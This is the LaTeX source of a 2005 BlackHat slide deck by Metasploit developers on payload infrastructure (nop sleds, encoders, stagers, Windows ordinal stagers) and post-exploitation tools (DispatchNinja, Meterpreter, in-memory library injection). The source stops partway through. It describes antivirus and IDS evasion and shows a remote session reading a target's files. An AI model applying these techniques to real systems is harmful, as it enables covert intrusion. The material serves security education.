1647 lines
46 KiB
TeX
1647 lines
46 KiB
TeX
|
\documentclass{beamer}
|
||
|
\usepackage{graphicx}
|
||
|
\usepackage{color}
|
||
|
|
||
|
\mode<presentation> { }
|
||
|
|
||
|
\usepackage[english]{babel}
|
||
|
\usepackage[latin1]{inputenc}
|
||
|
\usepackage{times}
|
||
|
\usepackage[T1]{fontenc}
|
||
|
% I think this looks cool, but whateva! - skape
|
||
|
%\usepackage{beamerthemeshadow}
|
||
|
|
||
|
% Love from spoon
|
||
|
\newcommand{\pdfpart}[1]{\label{pdfpart-#1}\pdfbookmark[0]{#1}{pdfpart-#1}\part{#1}}
|
||
|
\newenvironment{sitemize}{\vspace{1mm}\begin{itemize}\itemsep 4pt\small}{\end{itemize}}
|
||
|
\newenvironment{senumerate}{\vspace{1mm}\begin{enumerate}\itemsep 4pt\small}{\end{enumerate}}
|
||
|
|
||
|
% Presentation meta-information
|
||
|
\title{Beyond EIP}
|
||
|
\author[spoonm \& skape] {spoonm \& skape}
|
||
|
\date[BlackHat 2005] {BlackHat, 2005}
|
||
|
\subject{Beyond EIP}
|
||
|
|
||
|
% Add a spacer between each part
|
||
|
\AtBeginPart{\frame{\partpage}}
|
||
|
|
||
|
% Turn off the navigation on the bottom yo
|
||
|
\setbeamertemplate{navigation symbols}{}
|
||
|
% spoon hates berkeley!
|
||
|
%\usetheme[width=2.2cm]{Berkeley}
|
||
|
%\usecolortheme{sidebartab}
|
||
|
|
||
|
\begin{document}
|
||
|
|
||
|
\begin{frame}[t]
|
||
|
\titlepage
|
||
|
\end{frame}
|
||
|
|
||
|
|
||
|
%
|
||
|
% Introduction
|
||
|
% - Who are we
|
||
|
% - Why are we here, what will we say
|
||
|
% - What order we're going to say it in
|
||
|
%
|
||
|
\pdfpart{Introduction}
|
||
|
|
||
|
\begin{frame}[t]
|
||
|
\frametitle{Who are we?}
|
||
|
|
||
|
\begin{sitemize}
|
||
|
\item spoonm
|
||
|
\begin{sitemize}
|
||
|
\item Full-time student
|
||
|
\item Metasploit developer since late 2003
|
||
|
\end{sitemize}
|
||
|
|
||
|
\item skape
|
||
|
\begin{sitemize}
|
||
|
\item Lead software developer by day
|
||
|
\item Independent security researcher by night
|
||
|
\item Joined the Metasploit project in 2004
|
||
|
\item Responsible for all cool features
|
||
|
\end{sitemize}
|
||
|
\end{sitemize}
|
||
|
\end{frame}
|
||
|
|
||
|
\begin{frame}[t]
|
||
|
\frametitle{What's this presentation about?}
|
||
|
\begin{sitemize}
|
||
|
\item What it's not about
|
||
|
\begin{sitemize}
|
||
|
\item New exploit / attack vectors
|
||
|
\item New exploitation techniques
|
||
|
\item 0day, bugs, etc
|
||
|
\end{sitemize}
|
||
|
\pause
|
||
|
\item What it is about
|
||
|
\begin{sitemize}
|
||
|
\item What you can do after owning EIP
|
||
|
\item The techniques to do it
|
||
|
\item Our tools to support it
|
||
|
\end{sitemize}
|
||
|
\end{sitemize}
|
||
|
\end{frame}
|
||
|
|
||
|
\begin{frame}[t]
|
||
|
\frametitle{Plan of attack}
|
||
|
\begin{sitemize}
|
||
|
\item Payload Infrastructure
|
||
|
\begin{sitemize}
|
||
|
\item Payload composition
|
||
|
\item How payloads work
|
||
|
\item Recent tools, tricks, and techniques
|
||
|
\end{sitemize}
|
||
|
\item Post-exploitation tools
|
||
|
\begin{sitemize}
|
||
|
\item Background \& review of existing tools
|
||
|
\item The technology behind our tools
|
||
|
\item How they can be used
|
||
|
\item Crazy cool features for the end-user
|
||
|
\end{sitemize}
|
||
|
\end{sitemize}
|
||
|
\end{frame}
|
||
|
|
||
|
\begin{frame}[t]
|
||
|
\frametitle{Our definitions: the exploitation cycle}
|
||
|
|
||
|
\begin{sitemize}
|
||
|
\item \textbf{Pre-exploitation} - Before the attack
|
||
|
\begin{sitemize}
|
||
|
\item Find a bug, isolate, write exploit
|
||
|
\item Write any other tools, payloads, etc
|
||
|
\end{sitemize}
|
||
|
|
||
|
\pause
|
||
|
\item \textbf{Exploitation} - Leveraging the vulnerability
|
||
|
\begin{sitemize}
|
||
|
\item Recon, information gathering, find target
|
||
|
\item Initialize tools and infrastructure
|
||
|
\item Launch the exploit
|
||
|
\end{sitemize}
|
||
|
|
||
|
\pause
|
||
|
\item \textbf{Post-exploitation} - Manipulating the target
|
||
|
\begin{sitemize}
|
||
|
\item Arbitrary command execution
|
||
|
\item Command execute via shell
|
||
|
\item File access, VNC, pivoting, etc
|
||
|
\item Advanced payload interaction
|
||
|
\end{sitemize}
|
||
|
\end{sitemize}
|
||
|
\end{frame}
|
||
|
|
||
|
%
|
||
|
% This section is basically here to introduce them to all of the mechanisms
|
||
|
% of a modern day payload system. Just introduce and define the pieces, and
|
||
|
% explain their roles. Then, later, we will discuss the details of them..
|
||
|
%
|
||
|
% We should try hard not to introduce anything new in this section!, Any
|
||
|
% examples in explainations
|
||
|
%
|
||
|
% This section should be an _introduction_ to what payload infrastructure is
|
||
|
% but it should not have any specific details about our implementations.
|
||
|
%
|
||
|
% - What is a nop sled, and why / how / when do we use them
|
||
|
% - What is an encoder, and why / how / when do we use them
|
||
|
% - What is a stager and stage, why / how / when do we use them
|
||
|
%
|
||
|
% We should also talk about egghunt, heapfix, jmpcode, etc. We should have
|
||
|
% a name for these sort of things, they are like "bootstrap" codes, or
|
||
|
% something. Like, we need a a good name for them dude!
|
||
|
%
|
||
|
\pdfpart{Payload Infrastructure}
|
||
|
|
||
|
\begin{frame}[t]
|
||
|
\frametitle{Anatomy of a Payload}
|
||
|
\Large{[ \alert<1>{nops} ] [ \alert<2>{decoder} ( \alert<3>{encoded payload} ) ]}
|
||
|
|
||
|
\begin{sitemize}
|
||
|
\item \textbf{Nop sled}
|
||
|
\begin{sitemize}
|
||
|
\item For exploits where return is uncertain
|
||
|
\item Control flows through the sled into the encoder
|
||
|
\item Generally 1 byte aligned for x86
|
||
|
\end{sitemize}
|
||
|
|
||
|
\pause
|
||
|
\item \textbf{Decoder}
|
||
|
\begin{sitemize}
|
||
|
\item Synonymous with payload encoder
|
||
|
\item Loops and decodes payload
|
||
|
\item Payload executed when finished
|
||
|
\end{sitemize}
|
||
|
|
||
|
\pause
|
||
|
\item \textbf{Payload}
|
||
|
\begin{sitemize}
|
||
|
\item Arbitrary code
|
||
|
\item Typically provides a command shell
|
||
|
\end{sitemize}
|
||
|
\end{sitemize}
|
||
|
\end{frame}
|
||
|
|
||
|
\section{Nop sleds}
|
||
|
|
||
|
%
|
||
|
% Why do we use them?
|
||
|
% Don't really need them for win32, why?
|
||
|
% Previous work (0x90, admutate)
|
||
|
|
||
|
\begin{frame}[t]
|
||
|
\frametitle{What's a nop sled?}
|
||
|
|
||
|
\textbf{Definition}
|
||
|
\begin{sitemize}
|
||
|
\item A series of bytes that equate to no-operations on the
|
||
|
target architecture
|
||
|
\end{sitemize}
|
||
|
|
||
|
\pause
|
||
|
\textbf{How a nop sled works}
|
||
|
\begin{sitemize}
|
||
|
\pause
|
||
|
\item Client builds a nop sled and prepends it to a payload
|
||
|
\pause
|
||
|
\item Client transmits the entire payload via an exploit
|
||
|
\pause
|
||
|
\item Target executes all, some, or none of the nop
|
||
|
instructions
|
||
|
\pause
|
||
|
\item Execution falls through to the payload
|
||
|
\end{sitemize}
|
||
|
|
||
|
\end{frame}
|
||
|
|
||
|
\begin{frame}[t]
|
||
|
\frametitle{What's so cool about nop sleds?}
|
||
|
|
||
|
\begin{sitemize}
|
||
|
\item Not all vulnerabilities have predictable return
|
||
|
addresses
|
||
|
\begin{sitemize}
|
||
|
\item Particularly useful when brute forcing
|
||
|
\end{sitemize}
|
||
|
|
||
|
\pause
|
||
|
\item Using a sled can improve exploit quality
|
||
|
\begin{sitemize}
|
||
|
\item Increasing the brute force step size decreases
|
||
|
number of attempts
|
||
|
\end{sitemize}
|
||
|
\end{sitemize}
|
||
|
\end{frame}
|
||
|
|
||
|
\begin{frame}[t]
|
||
|
\frametitle{Nop sled technology}
|
||
|
|
||
|
\textbf{Existing technology}
|
||
|
\begin{sitemize}
|
||
|
\item \footnotesize{\texttt{perl -e 'print "$\backslash$x90" x \$ARGV[0]"'
|
||
|
sled\_size}}
|
||
|
\item ADMutate - single-byte x86
|
||
|
\end{sitemize}
|
||
|
|
||
|
\textbf{Metasploit technology}
|
||
|
\begin{sitemize}
|
||
|
\item Opty2 multi-byte sled generator
|
||
|
\item Based on Optyx's multi-byte sled generator
|
||
|
\end{sitemize}
|
||
|
\end{frame}
|
||
|
|
||
|
\section{Encoders}
|
||
|
|
||
|
% Why, etc
|
||
|
% Talk about any previous work?
|
||
|
|
||
|
\begin{frame}[t]
|
||
|
\frametitle{What's an encoder?}
|
||
|
|
||
|
\textbf{Definition}
|
||
|
\begin{sitemize}
|
||
|
\item Algorithm to retain payload functionality, but alter the byte sequence
|
||
|
\end{sitemize}
|
||
|
|
||
|
\pause
|
||
|
\textbf{How an encoder works}
|
||
|
\begin{sitemize}
|
||
|
\pause
|
||
|
\item Client encodes the payload prior to transmission
|
||
|
\pause
|
||
|
\item Client prepends decoder stub to the payload
|
||
|
\pause
|
||
|
\item Client transmits the entire payload via an exploit
|
||
|
\pause
|
||
|
\item Target executes the decoder stub
|
||
|
\pause
|
||
|
\item Decoder stub performs inverse operation on the payload
|
||
|
\pause
|
||
|
\item Original payload is executed
|
||
|
\end{sitemize}
|
||
|
\end{frame}
|
||
|
|
||
|
\begin{frame}[t]
|
||
|
\frametitle{What's so cool about encoders?}
|
||
|
|
||
|
\begin{sitemize}
|
||
|
\item Avoid common restricted characters
|
||
|
(\texttt{0x00}, \texttt{0x0a}, etc)
|
||
|
\item Survive application translations (unicode, toupper)
|
||
|
|
||
|
\pause
|
||
|
\item IDS evasion
|
||
|
\begin{sitemize}
|
||
|
\item Static string signatures
|
||
|
(\texttt{/bin/sh})
|
||
|
\item Specific payload and payload pattern signatures
|
||
|
\end{sitemize}
|
||
|
\end{sitemize}
|
||
|
\end{frame}
|
||
|
|
||
|
\begin{frame}[t]
|
||
|
\frametitle{Encoder technology}
|
||
|
|
||
|
\textbf{Existing technology}
|
||
|
\begin{sitemize}
|
||
|
\item XOR
|
||
|
\begin{sitemize}
|
||
|
\item Defacto standard for encoders
|
||
|
\item Typically performed on a byte, word, or dword basis
|
||
|
\item Variable or static key
|
||
|
\item Decoder stubs are usually static excluding the key
|
||
|
\end{sitemize}
|
||
|
|
||
|
\pause
|
||
|
\item Alphanumeric / Unicode
|
||
|
\begin{sitemize}
|
||
|
\item Rix's x86 encoder from Phrack 57
|
||
|
\item SkyLined's Alpha2 x86 ascii and unicode encoder
|
||
|
\item Dave Aitel and FX's unicode encoders
|
||
|
\end{sitemize}
|
||
|
\end{sitemize}
|
||
|
\textbf{Metasploit technology}
|
||
|
\begin{sitemize}
|
||
|
\item Shikata Ga Nai
|
||
|
\end{sitemize}
|
||
|
\end{frame}
|
||
|
|
||
|
\section{Payloads}
|
||
|
|
||
|
\begin{frame}[t]
|
||
|
\frametitle{What's a payload?}
|
||
|
|
||
|
\textbf{Definition}
|
||
|
\begin{sitemize}
|
||
|
\item Arbitrary code that is to be executed upon successful
|
||
|
exploitation
|
||
|
\end{sitemize}
|
||
|
|
||
|
\pause
|
||
|
\textbf{How a payload works}
|
||
|
\begin{sitemize}
|
||
|
\item Client prepares the payload for execution
|
||
|
\pause
|
||
|
\item Data may be embedded (cmd to execute, hostname, port, etc)
|
||
|
\pause
|
||
|
\item Client transmits the payload via an exploit
|
||
|
\pause
|
||
|
\item Target executes the payload
|
||
|
\end{sitemize}
|
||
|
\end{frame}
|
||
|
|
||
|
\begin{frame}[t]
|
||
|
\frametitle{The three types of payloads}
|
||
|
|
||
|
\begin{sitemize}
|
||
|
\item \textbf{Single}
|
||
|
\begin{sitemize}
|
||
|
\item A self-contained payload that performs a specific
|
||
|
task
|
||
|
\item Size varies depending on the task
|
||
|
\item Example: Reverse or bind command shell
|
||
|
\end{sitemize}
|
||
|
|
||
|
\pause
|
||
|
\item \textbf{Stager}
|
||
|
\begin{sitemize}
|
||
|
\item A stub payload that loads / bootstraps a stage
|
||
|
\item Size generally much smaller than single payloads
|
||
|
\item Passes connection information onto the stage
|
||
|
\end{sitemize}
|
||
|
|
||
|
\pause
|
||
|
\item \textbf{Stage}
|
||
|
\begin{sitemize}
|
||
|
\item Similar to a single payload, but takes advantage
|
||
|
of staging
|
||
|
\item Uses connection passed from the stager
|
||
|
\item Not subject to size limitations of individual
|
||
|
vulnerabilities
|
||
|
\item A stager can also be a stage
|
||
|
\end{sitemize}
|
||
|
\end{sitemize}
|
||
|
\end{frame}
|
||
|
|
||
|
\subsection{Single}
|
||
|
|
||
|
\begin{frame}[t]
|
||
|
\frametitle{Single payloads}
|
||
|
|
||
|
\begin{sitemize}
|
||
|
\item Easy plug \& chug payloads
|
||
|
|
||
|
\pause
|
||
|
\item Task oriented and connection specific
|
||
|
|
||
|
\pause
|
||
|
\item Single payloads have to be developed for each
|
||
|
connection (portbind, reverse, findsock)
|
||
|
\begin{sitemize}
|
||
|
\item Requires the payload to be implemented \textit{N} times
|
||
|
\item Shellcode development systems tried to help with this
|
||
|
\end{sitemize}
|
||
|
|
||
|
\pause
|
||
|
\item Subject to size limitations of individual
|
||
|
vulnerabilities
|
||
|
\end{sitemize}
|
||
|
\end{frame}
|
||
|
|
||
|
% Previous work?
|
||
|
% Explain singles/stagers/stages
|
||
|
|
||
|
\subsection{Stagers}
|
||
|
% What is a stager and why
|
||
|
\begin{frame}[t]
|
||
|
\frametitle{Payload stagers}
|
||
|
|
||
|
\begin{sitemize}
|
||
|
\item Stagers are typically network based and follow three
|
||
|
basic steps
|
||
|
\begin{sitemize}
|
||
|
\item Establish connection to attacker (reverse,
|
||
|
portbind, findsock)
|
||
|
\item Read in a payload from the connection
|
||
|
\item Setup connection information and branch to stage
|
||
|
\end{sitemize}
|
||
|
|
||
|
\pause
|
||
|
\item The three steps make it so stages are independent of the
|
||
|
connection method
|
||
|
\begin{sitemize}
|
||
|
\item No need to have command shell payloads for
|
||
|
reverse, portbind, and findsock
|
||
|
\end{sitemize}
|
||
|
\end{sitemize}
|
||
|
\end{frame}
|
||
|
|
||
|
\begin{frame}[t]
|
||
|
\frametitle{Why are payload stagers useful?}
|
||
|
|
||
|
\begin{sitemize}
|
||
|
\item Some vulnerabilities have limited space for the
|
||
|
initial payload
|
||
|
|
||
|
\item Typically much smaller than the stages
|
||
|
they execute
|
||
|
|
||
|
\pause
|
||
|
\item Eliminate the need to re-implement payloads for each
|
||
|
connection method
|
||
|
|
||
|
\pause
|
||
|
\item Provides an abstraction level for loading code onto a remote
|
||
|
machine through any medium
|
||
|
\end{sitemize}
|
||
|
\end{frame}
|
||
|
|
||
|
\begin{frame}[t]
|
||
|
\frametitle{Existing payload stager technology}
|
||
|
|
||
|
\begin{sitemize}
|
||
|
\item Standard reverse, portbind, and findsock stagers
|
||
|
included in Metasploit 2.2+
|
||
|
|
||
|
\item LSD Win32 Assembly Components
|
||
|
|
||
|
\item Found in public exploits (Solar Eclipse OpenSSL)
|
||
|
|
||
|
% TODO: others?
|
||
|
\end{sitemize}
|
||
|
\end{frame}
|
||
|
|
||
|
\subsection{Stages}
|
||
|
% Command shell
|
||
|
% or whatever
|
||
|
\begin{frame}[t]
|
||
|
\frametitle{Payload stages}
|
||
|
|
||
|
\begin{sitemize}
|
||
|
\item Payload stages are executed by payload stagers and
|
||
|
perform arbitrary tasks
|
||
|
|
||
|
\pause
|
||
|
\item Some examples of payload stages include
|
||
|
\begin{sitemize}
|
||
|
\item Execute a command shell and redirect IO to the
|
||
|
attacker
|
||
|
\item Execute an arbitrary command (ex adduser)
|
||
|
\item Download an executable from a URL and execute it
|
||
|
\end{sitemize}
|
||
|
\end{sitemize}
|
||
|
\end{frame}
|
||
|
|
||
|
\begin{frame}[t]
|
||
|
\frametitle{Why are payload stages useful?}
|
||
|
|
||
|
\begin{sitemize}
|
||
|
\item Highly reusable (connection independent, etc)
|
||
|
\item Can conform to some sort of ABI
|
||
|
|
||
|
\pause
|
||
|
\item Not subject to size limitations of individual
|
||
|
vulnerabilities
|
||
|
\item This means they can be arbitrarily complex
|
||
|
\end{sitemize}
|
||
|
\end{frame}
|
||
|
|
||
|
\begin{frame}[t]
|
||
|
\frametitle{``Advantage'' payloads}
|
||
|
|
||
|
\begin{sitemize}
|
||
|
\item Shellcode generation systems
|
||
|
\item Generally have more features because they're easier to write
|
||
|
\item The system's infrastructure makes the payloads more capable
|
||
|
\item Help to reduce the tediousness of writing payloads
|
||
|
|
||
|
\pause
|
||
|
|
||
|
\item Stealth's Hellkit
|
||
|
\item Core ST's InlineEgg
|
||
|
\item Philippe's Shellforge
|
||
|
\item Dave Aitel's MOSDEF
|
||
|
|
||
|
\end{sitemize}
|
||
|
\end{frame}
|
||
|
|
||
|
\section{Windows Ordinal Stagers}
|
||
|
|
||
|
\subsection{Overview}
|
||
|
\begin{frame}[t]
|
||
|
\frametitle{Windows ordinal stagers}
|
||
|
|
||
|
\begin{sitemize}
|
||
|
\item Technique from Oded's lightning talk at core04
|
||
|
\item Uses static ordinals in \texttt{WS2\_32.DLL} to locate symbol
|
||
|
addresses
|
||
|
\item Compatible with all versions of Windows (including 9X)
|
||
|
\item Results in very low-overhead symbol resolution
|
||
|
\item Facilitates implementation of reverse, portbind, and
|
||
|
findsock stagers
|
||
|
\item Leads to very tiny win32 stagers (92 byte reverse, 93
|
||
|
byte findsock)
|
||
|
\item Detailed write-up can be found in reference materials
|
||
|
\end{sitemize}
|
||
|
\end{frame}
|
||
|
|
||
|
\begin{frame}[t]
|
||
|
\frametitle{How ordinal stagers work}
|
||
|
|
||
|
\begin{sitemize}
|
||
|
\item Ordinals are unique numbers that identify exported
|
||
|
symbols in PE files
|
||
|
\item Each ordinal can be used to resolve the address of an
|
||
|
exported symbol
|
||
|
|
||
|
\pause
|
||
|
\item Most of the time, ordinals are incremented linearly by the
|
||
|
linker
|
||
|
\item Sometimes, however, developers may wish to force
|
||
|
symbols to use the same ordinal every build
|
||
|
\item When ordinals are the same every build, they are
|
||
|
referred to as static
|
||
|
|
||
|
\pause
|
||
|
\item Using an image's exports by ordinal instead of by name
|
||
|
is more efficient at runtime
|
||
|
\item However, it will not be reliably portable unless the
|
||
|
ordinals are known-static
|
||
|
|
||
|
\pause
|
||
|
\item Very few PE files use known-static ordinals, but
|
||
|
\texttt{WS2\_32.DLL} is one that does
|
||
|
\begin{sitemize}
|
||
|
\item 30 symbols use static ordinals in
|
||
|
\texttt{WS2\_32.DLL}
|
||
|
\end{sitemize}
|
||
|
\end{sitemize}
|
||
|
\end{frame}
|
||
|
|
||
|
\begin{frame}[t]
|
||
|
\frametitle{Limitations of ordinal stagers}
|
||
|
|
||
|
\begin{sitemize}
|
||
|
\item Only 30 symbols can be used
|
||
|
\begin{sitemize}
|
||
|
\item \texttt{WSASocketA} is not among them
|
||
|
\end{sitemize}
|
||
|
|
||
|
\pause
|
||
|
\item Can't initialize winsock if it isn't initialized
|
||
|
\begin{sitemize}
|
||
|
\item \texttt{WSAStartup} doesn't have a static ordinal
|
||
|
\end{sitemize}
|
||
|
|
||
|
\pause
|
||
|
\item Can't use sockets as direct standard I/O handles
|
||
|
\begin{sitemize}
|
||
|
\item Sockets returned from \texttt{socket} aren't valid
|
||
|
console handles
|
||
|
\item Must use pipes instead
|
||
|
\end{sitemize}
|
||
|
\end{sitemize}
|
||
|
\end{frame}
|
||
|
|
||
|
\subsection{Implementation}
|
||
|
\begin{frame}[t]
|
||
|
\frametitle{Implementing a reverse ordinal stager}
|
||
|
|
||
|
\begin{sitemize}
|
||
|
\item Locate the base address of \texttt{WS2\_32.DLL}
|
||
|
\begin{sitemize}
|
||
|
\item Extract the Peb->Ldr pointer
|
||
|
\item Extract Flink from the InInitOrderModuleList
|
||
|
\item Loop through loaded modules comparing module names
|
||
|
\item Module name is stored in unicode, but can be
|
||
|
partially translated to ANSI
|
||
|
\item Once \texttt{WS2\_32.DLL} is found, extract its
|
||
|
BaseAddress
|
||
|
\end{sitemize}
|
||
|
|
||
|
\pause
|
||
|
\item Resolve \texttt{socket}, \texttt{connect},
|
||
|
and \texttt{recv}
|
||
|
\begin{sitemize}
|
||
|
\item Use static ordinals to index the Export Directory Address Table
|
||
|
\end{sitemize}
|
||
|
|
||
|
\pause
|
||
|
\item Allocate a socket, connect to the attacker,
|
||
|
and read in the next payload
|
||
|
|
||
|
\pause
|
||
|
\item Requires that \texttt{WS2\_32.DLL} already be loaded
|
||
|
in the target process
|
||
|
\end{sitemize}
|
||
|
|
||
|
\end{frame}
|
||
|
|
||
|
\pdfpart{Post Exploitation}
|
||
|
|
||
|
\section{Introduction}
|
||
|
|
||
|
|
||
|
%
|
||
|
%
|
||
|
% NOTE, we should probably throw in some intermitent demos just
|
||
|
% to help the audience from getting bored. We should figure out how
|
||
|
% we can demo some of the parts before Features, or if we should reord
|
||
|
% some things so there are some demoables...
|
||
|
%
|
||
|
%
|
||
|
|
||
|
%
|
||
|
% Oh, I have a good idea, we should talk about dN in the introduction, since
|
||
|
% it's a really simple example of post exploitation. Then we'll demo that
|
||
|
% and then go into the meterpreter stuff, and then demo that at the end!
|
||
|
%
|
||
|
|
||
|
%
|
||
|
% What is post exploitation?
|
||
|
%
|
||
|
% Most important to audience
|
||
|
% 1) Features
|
||
|
% 2) Evasion
|
||
|
% 3) Technology
|
||
|
%
|
||
|
% Presentation Order
|
||
|
% 1) Technology (lib inject, etc)
|
||
|
% 2) Evasion (diskless, encryption, http tuennling maybe)
|
||
|
% 3) Features (and made demos)
|
||
|
%
|
||
|
% Maybe we shoud just merge Evasion into technology, there is no good
|
||
|
% reason for them to be seperate, and it makes the explination more
|
||
|
% continuious
|
||
|
%
|
||
|
|
||
|
\begin{frame}[t]
|
||
|
\frametitle{What is post-exploitation?}
|
||
|
|
||
|
\begin{sitemize}
|
||
|
\pause
|
||
|
\item The purpose of an exploit is to manipulate a target
|
||
|
|
||
|
\pause
|
||
|
\item Manipulation of a target begins in post-exploitation
|
||
|
\begin{sitemize}
|
||
|
\item Command shells are executed
|
||
|
\item Files are downloaded
|
||
|
\end{sitemize}
|
||
|
|
||
|
\pause
|
||
|
\item Represents the culmination of the exploitation cycle
|
||
|
\end{sitemize}
|
||
|
\end{frame}
|
||
|
|
||
|
\begin{frame}[t]
|
||
|
\frametitle{What do most people do in post-exploitation?}
|
||
|
|
||
|
\begin{sitemize}
|
||
|
\item Most people spawn a command shell
|
||
|
\begin{sitemize}
|
||
|
\item Poor automation support
|
||
|
\item Reliant on the shell's intrinsic commands
|
||
|
\item Limited to installed applications
|
||
|
\item Can't provide advanced features
|
||
|
\end{sitemize}
|
||
|
|
||
|
\pause
|
||
|
\item Some people use syscall proxies
|
||
|
\begin{sitemize}
|
||
|
\item Good automation support
|
||
|
\item Partial or full access to target native API
|
||
|
\item Can be clumsy when implementing complex features
|
||
|
\item Typically require specialized build steps
|
||
|
\end{sitemize}
|
||
|
\end{sitemize}
|
||
|
\end{frame}
|
||
|
|
||
|
%
|
||
|
% Introduction - Dispatch Ninja
|
||
|
%
|
||
|
% Gentle introduction into post-exploitation with simple overview and a
|
||
|
% demo about how dN works!
|
||
|
%
|
||
|
|
||
|
\section{DispatchNinja}
|
||
|
\begin{frame}[t]
|
||
|
\frametitle{DispatchNinja - Caveman Post Exploitation}
|
||
|
|
||
|
\begin{sitemize}
|
||
|
\item The idea is to have interactive shellcode
|
||
|
\item And be able to keep a very low footprint
|
||
|
\pause
|
||
|
\item But also have lots of optional power
|
||
|
|
||
|
\pause
|
||
|
\
|
||
|
\item Basically a shellcode read-eval-print loop
|
||
|
\item First stage loops, reading/executing code
|
||
|
\item DispatchNinja "modules" are sent and executed
|
||
|
\item This is what we call "dispatching"
|
||
|
|
||
|
\pause
|
||
|
\
|
||
|
|
||
|
\item Modules are responsible for their own mini-protocols
|
||
|
\item Each module has a corresponding handler on client side
|
||
|
|
||
|
\pause
|
||
|
\
|
||
|
|
||
|
\item Modules have a simple C ABI, and have a main function
|
||
|
\item Most of our dN modules were written in C (shellforge)
|
||
|
|
||
|
|
||
|
\end{sitemize}
|
||
|
\end{frame}
|
||
|
|
||
|
|
||
|
\begin{frame}[t]
|
||
|
\frametitle{DispatchNinja - Client side APIs}
|
||
|
|
||
|
\begin{sitemize}
|
||
|
\item Client side APIs wrap handler and module code
|
||
|
\item Msf3 has ruby dN client side APIs
|
||
|
|
||
|
\pause
|
||
|
\
|
||
|
\item APIs modeled after the ruby APIs (Dir, File, etc)
|
||
|
\item Our APIs should support the majority of Ruby functionality
|
||
|
|
||
|
\end{sitemize}
|
||
|
|
||
|
\end{frame}
|
||
|
|
||
|
\begin{frame}[t, fragile]
|
||
|
\footnotesize{
|
||
|
\begin{verbatim}
|
||
|
irb#1(main):001:0> c = @c
|
||
|
=> #<Rex::Post::DispatchNinja::Client:0xb7bf542c
|
||
|
@sock=#<TCPSocket:0xb7bf5440>>
|
||
|
irb#1(main):002:0> c.dir.entries('/tmp')
|
||
|
=> [".", "..", ".X11-unix", ".ICE-unix", ".font-unix"]
|
||
|
|
||
|
irb#1(main):004:0> puts c.file.stat('/etc/passwd').pretty
|
||
|
Size: 1036 Blocks: 8 IO Block: 4096 Type: 0
|
||
|
Device: 774 Inode: 81499 Links: 1
|
||
|
Mode: 100644/rw-r--r--
|
||
|
Uid: 0 Gid: 0
|
||
|
Access: Tue Jul 26 20:08:09 EDT 2005
|
||
|
Modify: Wed Jul 06 20:45:04 EDT 2005
|
||
|
Change: Wed Jul 06 20:45:04 EDT 2005
|
||
|
=> nil
|
||
|
|
||
|
irb#1(main):005:0> Process.pid
|
||
|
=> 1496
|
||
|
irb#1(main):006:0> c.process.pid
|
||
|
=> 1498
|
||
|
|
||
|
\end{verbatim}
|
||
|
}
|
||
|
|
||
|
\end{frame}
|
||
|
|
||
|
%
|
||
|
% Introduction - Meterpreter
|
||
|
%
|
||
|
% Now give an overview of meterpreter!
|
||
|
%
|
||
|
|
||
|
\begin{frame}[t]
|
||
|
\frametitle{What is Meterpreter?}
|
||
|
|
||
|
\begin{sitemize}
|
||
|
\item Short for \textit{Meta-Interpreter}
|
||
|
\item An advanced post-exploitation system
|
||
|
\item Based on library injection technology
|
||
|
\item First released with Metasploit 2.3
|
||
|
\item Detailed write-up can be found in reference materials
|
||
|
\end{sitemize}
|
||
|
|
||
|
\begin{sitemize}
|
||
|
\pause
|
||
|
\item After exploitation, a Meterpreter server DLL is
|
||
|
loaded on the target
|
||
|
|
||
|
\pause
|
||
|
\item Attackers use a Meterpreter client to interact with
|
||
|
the server to...
|
||
|
\begin{sitemize}
|
||
|
\item Load run-time extensions in the form of DLLs
|
||
|
\item Interact with communication channels
|
||
|
\end{sitemize}
|
||
|
\end{sitemize}
|
||
|
\begin{sitemize}
|
||
|
\pause
|
||
|
\item But before understanding Meterpreter, one should understand
|
||
|
library injection...
|
||
|
|
||
|
\end{sitemize}
|
||
|
\end{frame}
|
||
|
|
||
|
|
||
|
|
||
|
%
|
||
|
% Technology - Library Injection
|
||
|
%
|
||
|
\section{Library Injection}
|
||
|
|
||
|
\subsection{Overview}
|
||
|
|
||
|
\begin{frame}[t]
|
||
|
\frametitle{Library injection}
|
||
|
|
||
|
\begin{sitemize}
|
||
|
\item Provides a method of loading a
|
||
|
library (DLL) into an exploited process
|
||
|
|
||
|
\pause
|
||
|
\item Libraries are functionally equivalent to executables
|
||
|
\begin{sitemize}
|
||
|
\item Full access to various OS-provided APIs
|
||
|
\item Can do anything an executable can do
|
||
|
\end{sitemize}
|
||
|
|
||
|
\pause
|
||
|
\item Library injection is covert; no new processes
|
||
|
need to be created
|
||
|
|
||
|
\pause
|
||
|
\item Detailed write-up can be found in reference materials
|
||
|
\end{sitemize}
|
||
|
\end{frame}
|
||
|
|
||
|
\begin{frame}[t]
|
||
|
\frametitle{Types of library injection}
|
||
|
|
||
|
\begin{sitemize}
|
||
|
\item Two primary methods exist to inject a library
|
||
|
\begin{senumerate}
|
||
|
\item \textbf{On-Disk}: loading a library from the target's
|
||
|
harddrive or a file share
|
||
|
\item \textbf{In-Memory}: loading a library entirely from memory
|
||
|
\end{senumerate}
|
||
|
\item Both are conceptually portable to non-Windows platforms
|
||
|
\end{sitemize}
|
||
|
\end{frame}
|
||
|
|
||
|
\begin{frame}[t]
|
||
|
\frametitle{On-Disk library injection}
|
||
|
|
||
|
\begin{sitemize}
|
||
|
\item Loading a library from disk has been the defacto
|
||
|
standard for Windows payloads
|
||
|
\item Loading a library from a file share was first
|
||
|
discussed by Brett Moore
|
||
|
\end{sitemize}
|
||
|
|
||
|
\pause
|
||
|
\begin{sitemize}
|
||
|
\item On-Disk injection is subject to filtering by Antivirus due to
|
||
|
filesystem access
|
||
|
\item Requires that the library file exist on the target's
|
||
|
harddrive or that the file share be reachable
|
||
|
\end{sitemize}
|
||
|
\end{frame}
|
||
|
|
||
|
\begin{frame}[t]
|
||
|
\frametitle{In-Memory library injection}
|
||
|
|
||
|
\begin{sitemize}
|
||
|
\item First Windows implementation released with Metasploit 2.2
|
||
|
|
||
|
\pause
|
||
|
\item Libraries are loaded entirely from memory
|
||
|
|
||
|
\pause
|
||
|
\item No disk access means no Antivirus interference
|
||
|
|
||
|
\pause
|
||
|
\item Most stealthy form of library injection thus far
|
||
|
identified
|
||
|
|
||
|
\pause
|
||
|
\item No disk access means no forensic trace if the machine
|
||
|
loses power
|
||
|
\end{sitemize}
|
||
|
\end{frame}
|
||
|
|
||
|
\subsection{In-Memory Implementation on Windows}
|
||
|
|
||
|
\begin{frame}[t]
|
||
|
\frametitle{In-Memory library injection on Windows}
|
||
|
|
||
|
\begin{sitemize}
|
||
|
